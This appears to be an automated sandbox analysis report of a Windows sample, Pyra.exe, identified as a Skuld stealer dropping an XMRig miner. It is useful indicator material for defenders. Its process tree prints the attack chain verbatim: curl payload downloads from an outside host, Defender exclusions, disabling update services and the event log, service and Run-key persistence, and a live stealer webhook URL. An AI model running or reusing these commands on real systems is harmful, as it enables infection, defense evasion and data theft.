Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
05/04/2025, 12:03
Static task
static1
Behavioral task
behavioral1
Sample
pyra/Pyra.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
pyra/data/data.bat
Resource
win10v2004-20250314-en
General
-
Target
pyra/Pyra.exe
-
Size
257KB
-
MD5
7a5e41ba12a894b44fb1a1624eb3e899
-
SHA1
c7e7321eaa462eab2c900003577de57ee4a1bc0a
-
SHA256
f5c969927a6ccabd7e29d659b1e0f28730fbe0e3c87063b194f8cc46b0c340df
-
SHA512
4b321938b3cc66fb344eb63c3482abc0fa896b52341c5614c93a5ae3efc14fb073fb0084a5fcd02e095976463c39a6a3c3a6027dc7f8297deee2b4ce31aaeb14
-
SSDEEP
6144:vTOEaJKAIbUNeolFb08afQ1Y28qUSyjPm:b3bQO4m
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1357468186764775586/BRP230l-SHvQfTpsLO5GgfFtW8ZwDogt43OWww-lXchxPOAw7f7pT6n98q0MMIyhGHyc
Signatures
-
Skuld family
-
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/1444-105-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-104-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-107-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-110-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-109-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-108-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-111-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-112-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-113-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-114-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-116-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/1444-115-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 5696 powershell.exe 2480 powershell.exe 1980 powershell.exe 2372 powershell.exe 920 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 2 IoCs
flow pid Process 8 5236 curl.exe 32 4056 curl.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 1932 file1.exe 384 file2.exe 4972 iixpziuhlnum.exe -
Modifies file permissions 1 TTPs 26 IoCs
pid Process 4296 icacls.exe 4956 icacls.exe 5816 icacls.exe 4112 icacls.exe 5368 icacls.exe 2896 icacls.exe 6076 icacls.exe 884 icacls.exe 4772 icacls.exe 1804 icacls.exe 5524 icacls.exe 5840 icacls.exe 6080 icacls.exe 5672 icacls.exe 4008 icacls.exe 1076 icacls.exe 1808 icacls.exe 2812 icacls.exe 5708 icacls.exe 3756 icacls.exe 3704 icacls.exe 5920 icacls.exe 4668 icacls.exe 5832 icacls.exe 2076 icacls.exe 4444 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" file1.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5368 powercfg.exe 1348 powercfg.exe 4868 powercfg.exe 4648 powercfg.exe 4672 powercfg.exe 4112 powercfg.exe 3656 powercfg.exe 5304 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe iixpziuhlnum.exe File opened for modification C:\Windows\system32\MRT.exe file2.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4972 set thread context of 3632 4972 iixpziuhlnum.exe 192 PID 4972 set thread context of 1444 4972 iixpziuhlnum.exe 197 -
resource yara_rule behavioral1/memory/1444-101-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-99-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-100-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-102-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-103-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-105-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-104-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-107-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-110-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-109-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-108-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-111-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-112-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-113-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-114-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-116-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/1444-115-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4692 sc.exe 4908 sc.exe 5776 sc.exe 1000 sc.exe 2056 sc.exe 4732 sc.exe 1876 sc.exe 1616 sc.exe 1884 sc.exe 5524 sc.exe 6072 sc.exe 5460 sc.exe 1352 sc.exe 4396 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 5416 timeout.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5696 powershell.exe 5696 powershell.exe 2480 powershell.exe 2480 powershell.exe 1980 powershell.exe 1980 powershell.exe 384 file2.exe 2372 powershell.exe 2372 powershell.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 384 file2.exe 4972 iixpziuhlnum.exe 920 powershell.exe 920 powershell.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 4972 iixpziuhlnum.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe 1444 explorer.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 5696 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 1932 file1.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 384 file2.exe Token: SeShutdownPrivilege 1348 powercfg.exe Token: SeCreatePagefilePrivilege 1348 powercfg.exe Token: SeShutdownPrivilege 4672 powercfg.exe Token: SeCreatePagefilePrivilege 4672 powercfg.exe Token: SeShutdownPrivilege 4868 powercfg.exe Token: SeCreatePagefilePrivilege 4868 powercfg.exe Token: SeShutdownPrivilege 4648 powercfg.exe Token: SeCreatePagefilePrivilege 4648 powercfg.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 4972 iixpziuhlnum.exe Token: SeShutdownPrivilege 3656 powercfg.exe Token: SeCreatePagefilePrivilege 3656 powercfg.exe Token: SeShutdownPrivilege 4112 powercfg.exe Token: SeCreatePagefilePrivilege 4112 powercfg.exe Token: SeShutdownPrivilege 5304 powercfg.exe Token: SeCreatePagefilePrivilege 5304 powercfg.exe Token: SeShutdownPrivilege 5368 powercfg.exe Token: SeCreatePagefilePrivilege 5368 powercfg.exe Token: SeLockMemoryPrivilege 1444 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2624 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3192 wrote to memory of 5584 3192 Pyra.exe 88 PID 3192 wrote to memory of 5584 3192 Pyra.exe 88 PID 5584 wrote to memory of 5696 5584 cmd.exe 89 PID 5584 wrote to memory of 5696 5584 cmd.exe 89 PID 5696 wrote to memory of 4748 5696 powershell.exe 91 PID 5696 wrote to memory of 4748 5696 powershell.exe 91 PID 4748 wrote to memory of 4940 4748 cmd.exe 93 PID 4748 wrote to memory of 4940 4748 cmd.exe 93 PID 4940 wrote to memory of 4404 4940 net.exe 94 PID 4940 wrote to memory of 4404 4940 net.exe 94 PID 4748 wrote to memory of 6112 4748 cmd.exe 95 PID 4748 wrote to memory of 6112 4748 cmd.exe 95 PID 4748 wrote to memory of 5236 4748 cmd.exe 96 PID 4748 wrote to memory of 5236 4748 cmd.exe 96 PID 4748 wrote to memory of 4056 4748 cmd.exe 98 PID 4748 wrote to memory of 4056 4748 cmd.exe 98 PID 4748 wrote to memory of 4668 4748 cmd.exe 99 PID 4748 wrote to memory of 4668 4748 cmd.exe 99 PID 4748 wrote to memory of 4956 4748 cmd.exe 100 PID 4748 wrote to memory of 4956 4748 cmd.exe 100 PID 4748 wrote to memory of 1804 4748 cmd.exe 101 PID 4748 wrote to memory of 1804 4748 cmd.exe 101 PID 4748 wrote to memory of 5816 4748 cmd.exe 102 PID 4748 wrote to memory of 5816 4748 cmd.exe 102 PID 4748 wrote to memory of 1808 4748 cmd.exe 103 PID 4748 wrote to memory of 1808 4748 cmd.exe 103 PID 4748 wrote to memory of 5524 4748 cmd.exe 104 PID 4748 wrote to memory of 5524 4748 cmd.exe 104 PID 4748 wrote to memory of 5832 4748 cmd.exe 105 PID 4748 wrote to memory of 5832 4748 cmd.exe 105 PID 4748 wrote to memory of 5840 4748 cmd.exe 106 PID 4748 wrote to memory of 5840 4748 cmd.exe 106 PID 4748 wrote to memory of 6080 4748 cmd.exe 107 PID 4748 wrote to memory of 6080 4748 cmd.exe 107 PID 4748 wrote to memory of 4112 4748 cmd.exe 108 PID 4748 wrote to memory of 4112 4748 cmd.exe 108 PID 4748 wrote to memory of 5672 4748 cmd.exe 109 PID 4748 wrote to memory of 5672 4748 cmd.exe 109 PID 4748 wrote to memory of 2076 4748 cmd.exe 110 PID 4748 wrote to memory of 2076 4748 cmd.exe 110 PID 4748 wrote to memory of 5368 4748 cmd.exe 111 PID 4748 wrote to memory of 5368 4748 cmd.exe 111 PID 4748 wrote to memory of 4772 4748 cmd.exe 112 PID 4748 wrote to memory of 4772 4748 cmd.exe 112 PID 4748 wrote to memory of 2812 4748 cmd.exe 113 PID 4748 wrote to memory of 2812 4748 cmd.exe 113 PID 4748 wrote to memory of 4008 4748 cmd.exe 116 PID 4748 wrote to memory of 4008 4748 cmd.exe 116 PID 4748 wrote to memory of 4444 4748 cmd.exe 117 PID 4748 wrote to memory of 4444 4748 cmd.exe 117 PID 4748 wrote to memory of 2896 4748 cmd.exe 118 PID 4748 wrote to memory of 2896 4748 cmd.exe 118 PID 4748 wrote to memory of 1076 4748 cmd.exe 119 PID 4748 wrote to memory of 1076 4748 cmd.exe 119 PID 4748 wrote to memory of 6076 4748 cmd.exe 120 PID 4748 wrote to memory of 6076 4748 cmd.exe 120 PID 4748 wrote to memory of 5708 4748 cmd.exe 121 PID 4748 wrote to memory of 5708 4748 cmd.exe 121 PID 4748 wrote to memory of 884 4748 cmd.exe 122 PID 4748 wrote to memory of 884 4748 cmd.exe 122 PID 4748 wrote to memory of 3756 4748 cmd.exe 123 PID 4748 wrote to memory of 3756 4748 cmd.exe 123 PID 4748 wrote to memory of 3704 4748 cmd.exe 124 PID 4748 wrote to memory of 3704 4748 cmd.exe 124 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3912 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pyra\Pyra.exe"C:\Users\Admin\AppData\Local\Temp\pyra\Pyra.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat2⤵
- Suspicious use of WriteProcessMemory
PID:5584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h' -WindowStyle Hidden"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5696 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h4⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\system32\net.exeNET SESSION5⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 SESSION6⤵PID:4404
-
-
-
C:\Windows\system32\where.exewhere curl5⤵PID:6112
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\file1.exe" "https://pyra.mov/test/test1" --silent --show-error5⤵
- Downloads MZ/PE file
PID:5236
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\file2.exe" "https://pyra.mov/test/test2" --silent --show-error5⤵
- Downloads MZ/PE file
PID:4056
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4668
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4956
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:1804
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5816
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:1808
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5524
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5832
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5840
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:6080
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4112
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5672
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:2076
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5368
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4772
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:2812
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4008
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4444
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:2896
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:1076
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:6076
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5708
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:884
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:3756
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:3704
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:4296
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"5⤵
- Modifies file permissions
PID:5920
-
-
C:\Windows\system32\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:5416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file1.exe' -Verb RunAs"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Users\Admin\AppData\Local\file1.exe"C:\Users\Admin\AppData\Local\file1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1932 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\file1.exe7⤵
- Views/modifies file attributes
PID:3912
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file2.exe' -Verb RunAs"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980 -
C:\Users\Admin\AppData\Local\file2.exe"C:\Users\Admin\AppData\Local\file2.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:384 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:1496
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:4204
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:5460
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:1352
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:4396
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:1000
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:2056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "BUZZLBYC"7⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "BUZZLBYC" binpath= "C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe" start= "auto"7⤵
- Launches sc.exe
PID:4732
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "BUZZLBYC"7⤵
- Launches sc.exe
PID:1876
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2624
-
C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exeC:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3416
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2368
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1616
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5776
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5524
-
-
